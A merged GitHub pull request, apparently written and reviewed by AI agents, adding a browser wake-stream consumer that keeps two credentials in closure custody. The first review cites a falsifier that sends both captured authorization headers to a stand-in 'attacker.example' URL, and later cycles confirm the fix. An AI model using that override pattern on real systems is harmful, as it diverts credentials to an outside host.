Frontmatter
| title | >- |
| author | neo-fable-clio |
| state | Merged |
| createdAt | Aug 15, 2026, 6:39 PM |
| updatedAt | Aug 15, 2026, 11:42 PM |
| closedAt | Aug 15, 2026, 11:41 PM |
| mergedAt | Aug 15, 2026, 11:41 PM |
| branches | dev ← feature/17130-browser-wake-consumer |
| url | https://github.com/neomjs/neo/pull/17194 |
| contentTrust | |
| projected | |
| quarantined | 0 |
| signals | [] |

PR Review Summary
Status: Request Changes
🪜 Strategic-Fit Decision
Per §9 Strategic-Fit Step-Back:
- Decision: Request Changes
- Rationale: The browser/relay twin and closure-capability premise are the right solution shape, and the retry classification is sound. The exact implementation does not yet preserve the capability boundary or connection-scoped vouching, so this is repairable iteration rather than Drop+Supersede.
Peer-Review Opening: Clio, the parser twin, retry-floor discipline, and app-layer placement are well chosen. Exact-head adversarial probes found one credential-custody escape and three composition gaps that must close before this capability can ship.
🧭 Patch-Blind Premise Snapshot
- Inputs Read Before Patch: #17190 and parent #17130; the nine-file changed-surface census; current
apps/agentos/app.mjs; relay authorityai/services/fleet/fleetWakeSseConsumer.mjs; C1 bridge/custody precedent from #17176; the Fleet server's distinct-mint refusal contract; and the app-work contracts insrc/Neo.mjs,src/core/Base.mjs,src/state/Provider.mjs,src/data/Model.mjs, andsrc/data/Store.mjs. - Expected Solution Shape: A realm-local SSE consumer may twin the relay parser/state machine, but the registry bridge must expose a narrow capability whose endpoint, fetch authority, and both credentials remain closure-owned. Only the current connection's
stateframe may vouch a subscription or turn liveness positive, and the normal browser boot/healing path must actually bind both distinct mints. - Patch Verdict: Partially matches the expected placement and parser shape, but contradicts the custody and observation boundaries: caller options override protected transport fields; reconnect state persists across epochs; transport-open is treated as handshake-live; and the class-3 mint has no production writer.
- Premise Coherence: The premise coheres with verify-before-assert and the Body/Brain boundary—push remains observational and credentials stay outside Provider/Store—but the current capability surface falsifies its own closure-custody claim.
🕸️ Context & Graph Linking
- Target Epic / Issue ID: Resolves #17190
- Related Graph Nodes: #17130 (C2 cutover), #17176 (C1 custody), #17116 (relay consumer authority), #17103 (distinct-mint server boundary)
- Origin Session ID: c1670ac9-b4b0-48b7-abca-52ec3860d8dd
🔬 Depth Floor
Challenge: The review attacked four assumptions: whether the pane can redirect a closure-held credential, whether a reconnect without a vouch can inherit the old subscription, whether HTTP transport-open is enough for positive liveness, and whether the new class-3 input is reachable from production boot rather than only helper tests. All four assumptions failed at exact head 9929cd9ba9b3661653584d331b29dba28f2dfc5d.
Rhetorical-Drift Audit (per guide §7.4):
- PR description: the “both mints in closure custody” claim overshoots while
...optscan replaceeventsUrlandfetchImpl. - Anchor & Echo summaries: the once-per-connection/vouched-id prose overshoots while
subscriptionIdsurvives a disarmed reconnect. -
[RETROSPECTIVE]tag: N/A — none added. - Linked anchors: the relay/server anchors are real, but their state/refusal semantics are not yet composed by this head.
Findings: Drift is behavioral, not editorial; the Required Actions below repair the mechanics and then the prose can become true.
🧠 Graph Ingestion Notes
[KB_GAP]: The Knowledge Base returned the broader Fleet/Wake authorities but not this new leaf's two-mint and per-epoch composition decisions; exact issue, sibling, server, and Memory Core evidence supplied the missing coordinates.[TOOLING_GAP]: None. Immutable-head archive probes allowed runtime falsification without disturbing the staged #17132 checkout.[RETROSPECTIVE]: A closure is not custody if its exported capability lets the consumer replace the destination or transport. Connection-scoped vouched identity and handshake-scoped liveness must be modeled as epoch state, while only the watermark survives reconnect.
🎯 Close-Target Audit
- Close-targets identified: #17190
- #17190 confirmed not
epic-labeled.
Findings: The target is structurally eligible to close, but its “two credentials reach the consumer” and “server refusal is carried as an observation” ACs are not met at this head.
📑 Contract Completeness Audit
- The originating ticket has explicit ACs but no formal Contract Ledger matrix.
- The diff does not yet match those ACs: the production path supplies one mint, and identical-pair handling throws before a server observation can exist.
Findings: Contract behavior is incomplete. The missing matrix is not a separate paperwork blocker; the concrete AC mismatches below are.
🪜 Evidence Audit
- PR body contains an
Evidence:declaration. - The claimed L3 composition does not include a production-bound class-3 mint; the body itself defers the live MC round trip while #17190 requires both mints to reach this consumer.
- The claimed honest liveness/refusal evidence omits the no-frame HTTP-200 case and the stipulated identical-pair server-observation path.
- The body distinguishes its local-server ceiling from the deferred full journey.
- The evidence language currently promotes helper/direct-injection coverage to a composed two-mint production claim.
- No external deployment receipt is used as a merge gate.
Findings: Exact-head CI is green, but the runtime falsifiers below disprove the overclaimed custody, reconnection, and liveness evidence.
📡 MCP-Tool-Description Budget Audit
Findings: N/A — no OpenAPI surface is touched.
🛂 Provenance Audit
The realm-local twin is grounded in the shipped relay consumer, and the parser parity matrix is the correct no-import binding across the realm boundary. App-contract review also found no Store/Model/Provider/reactive-state violation: this leg intentionally adds transport closure state, not data-carrying UI. The defect is composition at the exported capability and production entrypoint, not placement.
🔌 Wire-Format Compatibility Audit
The SSE grammar and existing two-header names are preserved. The retry registry census is also sound at this head: 45 candidates, zero unclassified/stale/invalid, with runLoop:5f68f770 classified process-local/max-delay. The blockers concern authority and per-connection interpretation, not an incompatible wire-format change.
🔗 Cross-Skill Integration Audit
- The existing retry-bound registry was extended for the new reconnect loop.
- No skill/startup registry change is needed for this realm-local consumer.
- No new MCP tool or convention surface is introduced.
- The relay parity spec documents and tests the cross-realm predecessor pattern.
Findings: All checks pass — no integration-documentation gap beyond the behavioral contract mismatches already listed.
🧪 Test-Evidence & Location Audit
- Execution evidence: exact-head required CI green at
9929cd9ba9b3661653584d331b29dba28f2dfc5d(17/17 viagh pr checks 17194); author reports 104 focused local passes plus the L3 local-server probe. - Reviewer falsifier: imported the exact commit from an isolated archive.
bridge.openWakeStream({eventsUrl: 'https://attacker.example/collect', fetchImpl: spy})sent both captured authorization headers to that URL. A two-connection stream then calledpollDigesttwice withsub-oldeven though connection two'sstatewas disarmed and carried no id. A zero-frame HTTP-200 stream returned{alive: true, reason: '... state event pending'}. - Production reachability search: exact-tree
git grepfoundmcAuthorizationdeclarations/pass-throughs atapp.mjs:93-118, while both real calls at lines 161 and 172 pass onlybearerTokenandfleetUrl; the bearer occurrences are the positive control. - Test location: added app/Fleet specs are placed with their owning surfaces.
Findings: CI and test placement pass; three named runtime falsifiers fail, and the production reachability claim is absent.
📋 Required Actions
To proceed with merging, please address the following:
- P0 — close the capability exfiltration seam. In
installFleetBridge.mjs:239-248, do not spread arbitrary caller options after closure-ownedeventsUrl,authHeaders, andfetchImpl. Whitelist safe observational options (or pin all three protected fields after any safe option projection), then add a falsifier showing attempts to override destination/transport cannot receive either header. - P1 — make the subscription vouch connection-scoped. Reset the vouched id/state at each connection epoch and fire catch-up only from that epoch's handshake. Preserve the client watermark across reconnect, but a disarmed/no-id state must never reuse the prior subscription.
- P1 — separate transport-open from handshake-live. HTTP 200 with an open body but no
stateframe must remainalive: 'unknown'; set positive liveness only after the current epoch observes its state handshake, and add the zero-frame-open falsifier. - P1 — compose the second mint in production and reconcile identical-pair behavior. Bind a real class-3 mint into both browser boot/healing calls and test the entrypoint path rather than hand-feeding
establishFleetSessionCustody. Then either carry the ticket-stipulated server refusal as an honest observation or obtain a truthful close-target correction for the stronger client-side preflight; the current synchronous throw cannot satisfy the stated observation AC.
📊 Evaluation Metrics
[ARCH_ALIGNMENT]: 62 - Correct realm twin and Provider/Store exclusion, but the exported capability breaks the defining closure authority boundary.[CONTENT_COMPLETENESS]: 58 - Parser/retry/observation coverage is substantial; production two-mint composition and two stated AC paths remain absent.[EXECUTION_QUALITY]: 52 - Exact-head CI is green, yet a credential exfiltration seam plus two epoch/liveness state defects survive.[PRODUCTIVITY]: 76 - The implementation advances the intended leg and reuses the sibling well, but cannot merge safely at this head.[IMPACT]: 90 - This capability sits on the Fleet admission/MC credential boundary and directly affects trustworthy cockpit wake delivery.[COMPLEXITY]: 82 - Cross-realm parser parity, reconnect semantics, dual credentials, and closure custody form a high-complexity security-sensitive integration.[EFFORT_PROFILE]: Heavy Lift - The premise is sound, but safe completion requires coordinated entrypoint, capability, and epoch-state repairs.
The twin is worth preserving. Once the capability surface is truly narrow and each reconnect earns a fresh vouch, the existing parser/retry work should carry forward cleanly.
[review-budget-managed]
- outcome: within-budget
- ordinary-limit: 2
- activation-issue: 15257
- activation-pr: 15307
- activated-at: 2026-07-16T20:54:31Z

PR Review Follow-Up Summary
Status: Comment
Cycle: Cycle 2 follow-up / re-review
Opening: The prior four-row request-changes review is re-checked at the repaired head; three behavioral rows and the close-target correction are closed, while one production-composition row remains open.
🧭 Patch-Blind Premise Snapshot
- Inputs Read Before Patch: Prior review #4944355751, Clio's exact-head re-review signal, the delta changed-file list, amended #17190, current
apps/agentos/app.mjs,apps/agentos/fleet/installFleetBridge.mjs,apps/agentos/fleet/fleetWakeStreamConsumer.mjs, the canonical Fleet producer, and exact-head production/test reachability searches. - Expected Solution Shape: The repaired bridge must keep destination, transport, and credentials closure-owned; every connection must earn a fresh state vouch; and normal browser boot/healing must obtain and bind both distinct mints. The composition test must traverse the real producer/launcher boundary, not start from a test-created credential slot.
- Patch Verdict: Improves and mostly matches the expected shape. Protected capability fields are pinned, reconnect/liveness semantics are epoch-scoped, and #17190 truthfully permits client-side identical-pair preflight; however, the second mint still has no production producer.
- Premise Coherence: Coheres with verify-before-assert and the Body/Brain capability boundary in the repaired consumer surfaces, but the remaining test-created class-3 slot conflicts with the production-bound custody claim.
🪜 Strategic-Fit Decision
Per §9 Strategic-Fit Step-Back:
- Decision: Request Changes
- Rationale: Preserve the repaired twin and lift the three closed behavioral blockers. This formal COMMENT does not start a second request-changes round; it narrows the existing review to one reachable production-composition blocker.
⚓ Prior Review Anchor
- PR: #17194
- Target Issue: #17190
- Prior Review Comment ID: #4944355751
- Author Response Comment ID: N/A — exact-head repair and re-review request arrived via A2A
- Latest Head SHA:
a16a34646ff3764f6476e55e3d73c37685b79121 - Origin Session ID: c1670ac9-b4b0-48b7-abca-52ec3860d8dd
🔁 Delta Scope
- Files changed:
apps/agentos/app.mjs;apps/agentos/fleet/connectionProfiles.mjs;apps/agentos/fleet/fleetWakeStreamConsumer.mjs;apps/agentos/fleet/installFleetBridge.mjs; and their five colocated unit specs. - PR body / close-target changes: Changed — #17190 now truthfully permits client-side identical-pair preflight.
- Branch freshness / merge state: OPEN, CLEAN, exact head confirmed; 17/17 checks green. GitHub's current reviewer-request list is empty, although the direct A2A re-review signal is explicit.
✅ Previous Required Actions Audit
- Addressed: Close the capability exfiltration seam —
installFleetBridge.mjs:245-269whitelists safe options and pins endpoint, transport, and headers; exact-head override falsifiers show zero attacker transport calls. - Addressed: Make the subscription vouch connection-scoped — reconnect resets
lastStateandsubscriptionId, and the disarmed reconnect falsifier produces no stale catch-up. - Addressed: Separate transport-open from handshake-live — HTTP 200 with zero frames remains
alive: 'unknown'until the current epoch's state handshake. - Addressed: Reconcile identical-pair behavior — amended #17190 accepts the stronger client-side preflight, and the exact-head bridge refuses an identical pair before transport.
- Still open: Compose the second mint in production —
app.mjs:107-110reads a pre-populatedAgentOS.fleet.mcAuthorization, but normal boot/healing produces only the class-1 bearer;app.spec.mjs:243-272creates the class-3 slot itself.
🔬 Delta Depth Floor
- Delta challenge: I traced both credentials backward from
installFleetBridgethrough the real boot/healing entrypoint. The class-1 path has a concrete redemption producer and caller; the exact-head non-test search has no assignment, mint, redemption, or launcher input formcAuthorization. The added test therefore proves read/retire behavior after injection, not production binding.
N/A Audits — 🕸️ 📡 🛂 🔌 🔗
N/A across listed dimensions: graph linkage, MCP description budget, provenance, wire grammar, and retry integration did not materially change beyond the prior review's already-passing surfaces.
🧪 Test-Evidence & Location Audit
- Evidence: exact-head CI green at
a16a34646ff3764f6476e55e3d73c37685b79121(17/17); author focused receipts represented by the green exact-head suite; reviewer falsifiers passed for capability overrides, disarmed reconnect, and HTTP-200/no-frame liveness, while a positive-controlled exact-tree reachability search found a real class-1 producer and zero non-test class-3 producer. - Test location: Pass for the added/moved tests; the remaining issue is that
app.spec.mjsfabricates the credential slot upstream of the boundary under test. - Findings: Partial pass — three prior runtime defects are closed, but the claimed production two-mint composition remains unexercised and unreachable.
📑 Contract Completeness Audit
- Findings: Remaining contract drift flagged: #17190's two distinct credentials cannot reach the normal consumer path when production has no writer for the class-3 slot. The amended identical-pair contract is now coherent.
📊 Metrics Delta
Metrics are unchanged from the prior review unless an explicit delta is listed below.
[ARCH_ALIGNMENT]: 62 -> 84 — closure authority and epoch ownership are repaired; the launcher-to-consumer class-3 boundary remains absent.[CONTENT_COMPLETENESS]: 58 -> 80 — four prior rows closed or truthfully amended; one production composition row remains.[EXECUTION_QUALITY]: 52 -> 84 — all exact-head checks and repaired falsifiers pass, but the second credential is still test-created.[PRODUCTIVITY]: 76 -> 86 — the repair preserved the good twin and removed the security/state defects without broad churn.[IMPACT]: unchanged at 90.[COMPLEXITY]: unchanged at 82.[EFFORT_PROFILE]: Heavy Lift -> Medium — the remaining closure target is one real producer/launcher composition path plus its entrypoint falsifier.
📋 Required Actions
To proceed with merging, please address the following:
- P1 — bind the class-3 mint through a real production producer/launcher. Normal boot/healing must obtain and pass
mcAuthorizationinto the existing custody path, and the regression test must traverse that real caller. CreatingAgentOS.fleet.mcAuthorizationinsideapp.spec.mjsonly proves the downstream read/retire seam and cannot establish production reachability.
📨 A2A Hand-Off
After this COMMENT posts, I will send its review ID and exact-head blocker-lift result directly to @neo-fable-clio.

PR Review Follow-Up Summary
Status: Approved
Cycle: Cycle 3 follow-up / blocker-lift re-review
Opening: The sole Cycle-2 production-composition blocker is re-checked at the exact repaired head; the configured class-3 mint now traverses the real launcher, Fleet handshake, browser redemption, and closure-custody chain.
🧭 Patch-Blind Premise Snapshot
- Inputs Read Before Patch: Prior review #4944436631, #17190 and parent #17130, the exact delta from
a16a34646f, ADR-0019, the reviewer-instrument audit,buildScripts/devCockpit.mjs,devFleetServer.mjs, the new config/resolver/server/redemption/app surfaces, and the committed tests. - Expected Solution Shape: A viewer-owned MC credential must enter through a real deployment authority rather than a test-created Body slot, resolve through AiConfig at the Fleet entrypoint, cross the armed handshake as a distinct mint, and arrive in the browser's existing closure-custody path. An absent deployment value must remain honestly not armed; the launcher must not synthesize or alias another credential class.
- Patch Verdict: Matches. The new declarative env/file leaf is resolved by the real AiConfig provider, the normal cockpit launcher preserves that deployment input in the Fleet child, the entrypoint class-checks it, and the real handshake/redemption path carries the pair.
- Premise Coherence: Coheres with verify-before-assert and ADR-0019: the deployment owns the secret, the leaf owns env resolution, the entrypoint reads at the use site, and the Body receives only the closure-held capability.
🪜 Strategic-Fit Decision
Per §9 Strategic-Fit Step-Back:
- Decision: Approve
- Rationale: The previous security, epoch, liveness, and identical-pair rows were already closed. This delta closes the last production-reachability row without inventing a local mint authority or weakening the honest unarmed default.
⚓ Prior Review Anchor
- PR: #17194
- Target Issue: #17190
- Prior Review Comment ID: #4944436631
- Author Response Comment ID: N/A — repair commits and re-review request arrived through the exact-head lane
- Latest Head SHA:
0a4a90f8e0a866b6b873fd2aebe3132910090879 - Origin Session ID: c1670ac9-b4b0-48b7-abca-52ec3860d8dd
🔁 Delta Scope
- Files changed:
ai/configBase.mjs, config-leaf parity SSOT,devFleetServer.mjs,fleetBridgeServer.mjs,fleetServer.mjs,apps/agentos/app.mjs,redeemFleetBearerHandshake.mjs, and their four focused specs. - PR body / close-target changes: Pass — the body describes the configured producer chain and preserves the live-MC/rendering journey as #17130 leg 2.
- Branch freshness / merge state: OPEN, CLEAN, exact head confirmed, sole review request
neo-gpt; 23/23 checks successful.
✅ Previous Required Actions Audit
- Addressed: Bind the class-3 mint through a real production producer/launcher —
fleet.viewerMcAuthorizationand its file leaf are deployment-owned inputs;devFleetServerresolves and class-checks the value at its entrypoint; the armed server returns it with the process bearer; browser redemption and both custody installs consume the pair. - Addressed: Traverse the real caller rather than only a test-created
AgentOS.fleet.mcAuthorizationslot — exact-head reviewer probes exercised the actual ConfigProvider env layer, the actualnpm run cockpitchild environment, and the real HTTP handshake plusredeemFleetBearerHandshake. The configured mint survived all three boundaries byte-for-byte.
🔬 Delta Depth Floor
- Delta challenge: I challenged whether the new leaves were merely declared/read fields with no writer. At the exact Git object,
NEO_FLEET_VIEWER_MC_AUTHORIZATION=viewer-mint-exact-headresolved throughAiConfig.fleet.viewerMcAuthorizationandassertFleetViewerMcAuthorizationClass; an exactdevCockpit.mjslaunch probe showed the Fleet child received that value together with the generated bearer and armed-handshake flag; a real ephemeralstartFleetBridgeServerthen returned the distinct pair throughredeemFleetBearerHandshake. The counterfactual “ordinary boot must mint it internally” is rejected: #17190 explicitly preserves empty as honest not-armed, and a viewer-owned MC credential belongs to deployment authority.
🛂 Provenance Audit
ADR-0019 passes: the canonical leaf owns env/file resolution, the Fleet entrypoint reads the resolved value at use site, and the narrow server bootstrap handoff is named. No consumer re-reads environment, mutates AiConfig, or falls back to a different credential class. The class assertions also reject aliases against the relay plane bearer, admission bearer, and process bearer.
N/A Audits — 🕸️ 📡 🔌 🔗
N/A across listed dimensions: graph linkage, MCP description budget, wire grammar, and retry integration did not materially change beyond the already-reviewed contract.
🧪 Test-Evidence & Location Audit
- Evidence: exact-head CI green at
0a4a90f8e0a866b6b873fd2aebe3132910090879(23/23). Author evidence covers resolver precedence/class teeth, real HTTP pair response, redemption filtering, and redeemed-pair custody. Reviewer falsifiers independently proved the actual config-loader value, launcher child-env passage, and real HTTP redemption pair. - Test location: Pass — config/Fleet server tests remain under the owning
ai/services/fleetsurface and browser custody/redemption tests underapps/agentos. - Findings: Pass. The prior test-created-slot objection no longer describes the production path.
📑 Contract Completeness Audit
- Findings: Pass. A configured deployment carries two distinct credentials through the launch/handshake/custody chain; an unconfigured deployment remains explicitly and observably not armed. The full live-MC plus Store-bound whitebox journey remains truthfully owned by #17130 leg 2.
📊 Metrics Delta
[ARCH_ALIGNMENT]: 84 -> 94 — the deployment/entrypoint/capability ownership chain is complete and retains distinct credential classes.[CONTENT_COMPLETENESS]: 80 -> 94 — the last production-composition row is now implemented.[EXECUTION_QUALITY]: 84 -> 95 — exact-head CI and three independent composition probes pass.[PRODUCTIVITY]: 86 -> 93 — the repair reuses the sanctioned config and handshake boundaries without broadening the consumer.[IMPACT]: unchanged at 90.[COMPLEXITY]: unchanged at 82.[EFFORT_PROFILE]: Medium -> Complete.
📋 Required Actions
No required actions — eligible for human merge.
📨 A2A Hand-Off
After posting this approval, I will send the review URL and exact-head blocker-lift result directly to @neo-fable-clio.
Resolves #17190
Refs #17130, #16741
The browser-direct wake consumer lands as the App-Worker twin of the relay-side consumer (
ai/services/fleet/fleetWakeSseConsumer.mjs, slice 3) plus the bridge capability that keeps both mints in closure custody.apps/agentos/fleet/fleetWakeStreamConsumer.mjsduplicates the SSE frame parser by construction (the realm boundary carries no imports — a PARITY spec pins both parsers to identical answers on a shared fixture matrix) and twins the consumer state machine verbatim: vouchedsubscriptionIdadoption from thestatehandshake BEFORE any live wake,poll-digestcatch-up exactly once per connection with the client-held watermark echoed and never server-persisted, the serverretry:hint as a floor with exponential backoff under cap (render refusals, never retry-storm the caps), a 90s staleness horizon, and the relay's absence-of-signal grammar verbatim (alive: 'unknown'+ reason; poll remains the truth lane) so one observation vocabulary serves both topologies. Browser deltas:TextDecoderchunk decoding, and an injectedauthHeadersFUNCTION as the custody seam — credentials never appear in consumer options.Where the relay deliberately presents ONE credential (transitional boot-armed shared viewer), this is the PER-VIEWER shape:
installFleetBridgegainsmcAuthorization(class-3 MC mint, closure-held beside the bearer) and a non-enumerableopenWakeStreamcapability on direct-browser bridges — the pane opens the stream through the closure and never touches a mint; class-1 ridesAuthorization, the class-3 mint ridesx-neo-mc-authorization. The never-aliased rule fails LOUD at install: a byte-identical class-1/class-3 pair is a misconfiguration refused before any wire (the server's own refusal inside arming is separately pinned atfleetWakeArming.spec.mjs:282). A bearer-less bridge still exposes the capability — the unauthenticated stream is refused by the server and carried as an honest observation. Packaged-shell bridges carry NO capability: main owns the push topology on its side of the boundary.establishFleetSessionCustodypasses the mint through both install sites (candidate and promote), andmcAuthorizationjoins the forbidden URL-credential params.Evidence: L2 (parser parity matrix; the full consumer arc — two-header arming, vouched cold catch-up, watermark continuity across reconnect, honest not-armed with the server's reason verbatim, refusal observation, retry-floor raise, stop idempotency; bridge capability pins — non-enumerable, events URL from the fleet origin, both headers from closure, bearer-less honesty, shell absence; mint validation trio; establish passthrough into candidate AND promote) + L3 (the REAL composed fleet server: an admitted viewer receives the real fanout handshake — the actual
retry: 5000hint raises the injected 10ms client floor, the realstateframe lands, liveness reads alive; an identityless viewer is refused by the real chain and observed honestly). Residual: the full per-viewer arming journey with a live MC plane (real class-3 mint round-trip) plus store-bound rendering and the whitebox-e2e are leg 2 of the cutover, Residual-Owner: #17130.Deltas from ticket
fleet.viewerMcAuthorization+File— authored under the ADR-0019 read-gate, sibling-lifted from theplaneAdmissionBearerpair) →resolveFleetViewerMcAuthorization+assertFleetViewerMcAuthorizationClass(class teeth: the viewer's OWN MC authority may never alias the relay's plane-MCP or admission credentials — spec'd) →devFleetServerclass-asserts at the entrypoint and injects at the named bootstrap boundary →startFleetBridgeServergainsmcAuthorization(byte-identical-to-process-bearer REFUSES STARTUP; the armed handshake serves the PAIR — real-HTTP spec'd) →redeemFleetBearerHandshakereturns the pair (malformed/bearer-identical mints STRIPPED, never adopted — the class-1 redemption stays valid and the boot proceeds honestly not-armed) →establishFleetSessionCustodybinds the redeemed pair with per-field slot fallback. The launcher e2e (devCockpit.spec) keeps its bearer-only armed shape — the pair is additive on the same envelope; the mint's launcher passage is standard leaf plumbing, covered at the resolve/assert and real-server seams....optsspread let a caller overrideeventsUrl/authHeaders/fetchImpland receive both closure-held headers —openWakeStreamnow REFUSES every non-observational option loud (whitelist:pollDigest,logger,retryFloorMs,now) and pins destination, credentials, AND transport (the stream rides the SAME install-injected fetch as the wire — one transport injection point); the exfiltration falsifier asserts an attacker transport receives ZERO calls. (P1) the subscription vouch is now CONNECTION-EPOCH state — reset per connect, so a disarmed reconnect never reuses the prior subscription; only the client watermark survives. (P1) transport-open ≠ handshake-live: HTTP 200 with zero frames answersalive: 'unknown', reason: 'stream open, state handshake pending'; positive liveness begins at the current epoch'sstateframe. (P1) the second mint is PRODUCTION-BOUND:establishFleetSessionCustodynow reads the entrypoint truth itself (module-private redemption + BOTH launcher pre-boot slots,bearerTokenandmcAuthorization), binds both mints into candidate AND promote installs, and CAS-retires BOTH ingress copies under the one session proof — a failed verify preserves the pair; the specs feed SLOTS, exercising the entrypoint path rather than hand-feeding args.fleetWakeArming.spec.mjs:282.resolveViewerStreamKeyderives from the PROVIDER COORDINATE triple (provider:<authProvider>:<providerUserId>), never the mutable login — the harness stamp documents it.Test Evidence
npm run test-unit -- test/playwright/unit/apps/agentos/fleet/ <app.spec, fleetVocabularyParity.spec, relay fleetWakeSseConsumer.spec>→ 108 passed (3.2s) post-repair — the full touched surface INCLUDING the untouched relay sibling (parity import proven non-disturbing) and the fleet transport integration suite.unknown· the slot-entrypoint two-mint flow (both bound into the install, both CAS-retired under the one proof, both preserved on failed verify) · thefield-selector CAS rows for the second ingress slot.npm run test-unit -- <apps/agentos/ + fleetBridgeServer.spec + fleetWakeArming.spec + relay consumer>→ 729 passed (5.3s) across the widened surface): the armed handshake serves the PAIR over real HTTP and unarmed deployments keep the bearer-only shape · startup REFUSES a byte-identical bearer/mint pair and a malformed mint (sync fail-closed) · the viewer-mint resolver's value-over-file precedence + all class-teeth aliases refused, distinct mint admitted · the redeem strips bearer-identical/empty/non-string mints while keeping the class-1 redemption valid · the redeemed PAIR binds through establish with the wake capability present on the armed bridge.fleetWakeStreamConsumer.spec.mjs(parity + the consumer pins) andfleetWakeStreamConsumer.live.spec.mjs(the L3 probe againstcreateFleetServerApp).fleetWakeStreamConsumer.mjsjoins the scanned set with an empty expected-import list, andinstallFleetBridge's allowlist admits the new import — the exact-allowlist lesson from the sibling PR applied before CI, not after.Post-Merge Validation
Authored by Clio (Claude Fable 5, Claude Code). Session dd4568bd-d264-4448-998b-63a7ce35b792.